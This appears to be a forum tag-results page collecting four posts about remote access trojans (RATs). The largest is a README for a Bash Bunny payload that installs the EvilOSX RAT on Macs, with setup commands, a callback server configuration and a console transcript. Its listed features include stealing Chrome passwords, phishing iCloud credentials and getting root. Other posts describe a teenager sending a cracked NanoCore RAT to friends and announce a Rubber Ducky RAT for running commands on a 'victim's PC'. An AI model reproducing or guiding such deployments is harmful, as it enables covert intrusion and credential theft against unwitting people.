Showing results for tags 'rat'.
Found 4 results
Please check git for the latest README/code: https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX

untitled_EVILOSX

     ______       _  _   ____    _____ __   __
    |  ____|     (_)| | / __ \  / ____|\ \ / /
    | |__ __   __ _ | || |  | || (___   \ V /
    |  __|\ \ / /| || || |  | | \___ \   > <
    | |____\ V / | || || |__| | ____) | / . \
    |______|\_/  |_||_| \____/ |_____/ /_/ \_\
    untitled_ bash bunny edition / stekole

** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. **
** Accessing a computer system or network without authorization or explicit permission is illegal. **

Features

- Client reconnects automatically/persistence
- ECM_ETHERNET and HID attack
- Emulate a simple terminal instance.
- Sockets are encrypted with CSR via OpenSSL.
- No dependencies (pure python).
- Retrieve Chrome passwords.
- Retrieve iCloud contacts.
- Attempt to get iCloud password via phishing.
- Show local iOS backups.
- Download and upload files.
- Retrieve find my iphone devices.
- Attempt to get root via local privilege escalation (<= 10.10.5).
- Auto installer

Configuration

Server

To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server.

    git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX
    ./Server

and type your listening port (1337)

Client

Before you deploy your bash bunny, update your configuration in the EvilOSX.py file. At the bottom of the file you will see a server and port variable. Set these to your server IP and listening port.

    #########################
    SERVER_HOST = "10.99.99.16"
    SERVER_PORT = 1337
    #########################

Usage

Plug in your bash bunny and wait until the script has finished running.
You should see the client connect to the server:

    root@kali:~/git/EvilOSX# ./Server.py
     ______       _  _   ____    _____ __   __
    |  ____|     (_)| | / __ \  / ____|\ \ / /
    | |__ __   __ _ | || |  | || (___   \ V /
    |  __|\ \ / /| || || |  | | \___ \   > <
    | |____\ V / | || || |__| | ____) | / . \
    |______|\_/  |_||_| \____/ |_____/ /_/ \_\

    [?] Port to listen on: 1337
    [I] Type "help" to get a list of available commands.
    > help
    help          - Show this help menu.
    status        - Show debug information.
    clients       - Show a list of clients.
    connect <ID>  - Connect to the client.
    exit          - Close the server and exit.
    > clients
    [I] 1 client(s) available:
    0 = client_hostname
    > connect 0
    [I] Connected to "client_hostname", ready to send commands.

Some of the other features can be found in the help menu. I have not tried them all.

    help             - Show this help menu.
    status           - Show debug information.
    clients          - Show a list of clients.
    connect <ID>     - Connect to the client.
    get_info         - Show basic information about the client.
    get_root         - Attempt to get root via local privilege escalation.
    download <path>  - Downloads the file to the local machine.
    upload <path>    - Uploads the file to the remote machine.
    chrome_passwords - Retrieve Chrome passwords.
    icloud_contacts  - Retrieve iCloud contacts.
    icloud_phish     - Attempt to get iCloud password via phishing.
    itunes_backups   - Show the user's local iOS backups.
    find_my_iphone   - Retrieve find my iphone devices.
    screenshot       - Takes a screenshot of the client.
    kill_client      - Brutally kill the client (removes the server).
    exit             - Exits the session.
    Any other command will be executed on the connected client.
Removal of Tool

The python script gets added to the user's ~/Library/ directory, and a startup file is added to the ~/Library/LaunchAgents directory.

    rm -rf ~/Library/Containers/.EvilOSX/
    launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist

Defence

Disable the command-space short key for Spotlight, or disable Spotlight altogether if not needed.

Todo

Issues

I ran into a few issues with the "Build" of the python script. If the default one in this payload doesn't work, regenerate a new EvilOSX.py. Run ./BUILDER and enter the appropriate information. After, copy this to your switch payload.

Thanks @Marten4n6

[YOURMOM](Check my room)
So this is basically an update to my post here:

I didn't know how the person got my RAT in the first place and how they got onto my computer. Now I know that it wasn't someone that got into my computer because of the cracked version of the RAT program - even though there was a silent Monero miner in it - but it was someone that got my file from VirusTotal. It's a site where you can scan files and see which out of like 50 antiviruses detect it. I didn't know that they distribute the files and that you can directly DOWNLOAD them from the site. So someone was probably running a bot on a virtual machine that downloads all files that get flagged as a RAT by the antivirus programs on VirusTotal and download them.

I remember that I once saw a video on YouTube where someone was able to get into the machine of someone that tried to RAT him by using the file of that person. So is there a way that someone used my file to get into my computer? What are they able to do with it?

Thanks for any answers ;)

PS: From now on, if I have to use an online virus scanner, I'm using nodistribute ^^
Hello, something really weird happened to me yesterday. I created a RAT that I encrypted in a WinRAR file and wanted to troll some of my friends with. I sent the file in the chat of my Discord server (similar to TeamSpeak) and before that tested it on virustotal.com and a similar site. No one downloaded it (unfortunately ^^), but a few hours later (when none of the people that were on the Discord were online anymore), I saw a connection coming in. I used a cracked version of NanoCore that I got from some hacking forum (it was created by Alcatraz3222 and thousands of people downloaded it).

The computer had an IP from the USA (doesn't have to be true, it shows that I'm from England even though I have a German IP) and had no antivirus installed. The name of it was something with a C at the beginning, and a y and an o (don't remember it exactly). I wanted to know who that was and opened the window to the screen. He had some old version of Windows installed which I didn't know (it's the one with the gray taskbar, pretty basic). There was a command prompt running, which had a Python logo and was named "clock". I don't remember what was in it, but it was testing for something the whole time and once said something about "found" and "terminated". The only other thing I saw was Wireshark on the desktop. A few seconds after that, he disappeared from my client list.

I didn't use any protection like a VPN or a firewall at that moment. After that, I got really scared for some reason and turned off my computer. Does someone know how he got on my list and what he was doing? Maybe I'm getting ratted and he wanted to see what that file was, or a Discord server ran the file? I really need your help ;)

Cheers, contrix_

PS: Sry for my bad English, I'm German and just 14 years old as you probably already assumed by my writing ^^

PPS: While writing this text I overwrote my text two times, even though I don't think I touched the insert button. I'm getting really paranoid xD
Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky.

Here is the GitHub Link: https://github.com/untitledusername/duckyRAT
GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki

Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line). This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below.

Edit: I'm working on adding features to take screenshots of the victim's desktop, webcam, etc.

Thanks everybody, enjoy! - untitled ❤